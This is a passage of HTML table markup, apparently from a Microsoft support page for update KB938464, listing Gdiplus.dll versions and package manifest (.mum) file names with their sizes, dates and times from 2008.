class=\"sbody-td\">01-May-2008</td><td class=\"sbody-td\">03:22</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">6.0.6000.16683</td><td class=\"sbody-td\">1,823,232</td><td class=\"sbody-td\">30-Apr-2008</td><td class=\"sbody-td\">05:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">6.0.6000.20826</td><td class=\"sbody-td\">1,823,232</td><td class=\"sbody-td\">01-May-2008</td><td class=\"sbody-td\">03:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">6.0.6001.18065</td><td class=\"sbody-td\">1,823,232</td><td class=\"sbody-td\">30-Apr-2008</td><td class=\"sbody-td\">05:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">6.0.6001.22170</td><td class=\"sbody-td\">1,823,232</td><td class=\"sbody-td\">01-May-2008</td><td class=\"sbody-td\">03:22</td><td class=\"sbody-td\">x86</td></tr></table></div><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb938464_bf~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,238</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb938464~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,497</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb938464_bf~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,401</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb938464~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,664</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb938464_bf~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,243</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb938464~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,506</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_4_for_kb938464_bf~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,245</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_4_for_kb938464~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,506</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_5_for_kb938464_bf~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,245</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_5_for_kb938464~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,506</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_6_for_kb938464_bf~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,240</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_6_for_kb938464~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,501</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_client_0_bf~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,416</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_client_0~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,435</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_client_1_bf~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,357</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_client_1~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,377</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_client_bf~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,691</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_client~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,722</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_sc_0_bf~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,412</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_sc_0~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,431</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_sc_bf~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,413</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_sc~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,432</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_server_0_bf~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,415</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_server_0~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,435</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_server_bf~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,421</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_server~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,440</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpesrv_0_bf~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,412</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpesrv_0~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,431</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpesrv_bf~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,420</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpesrv~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,439</td></tr><tr 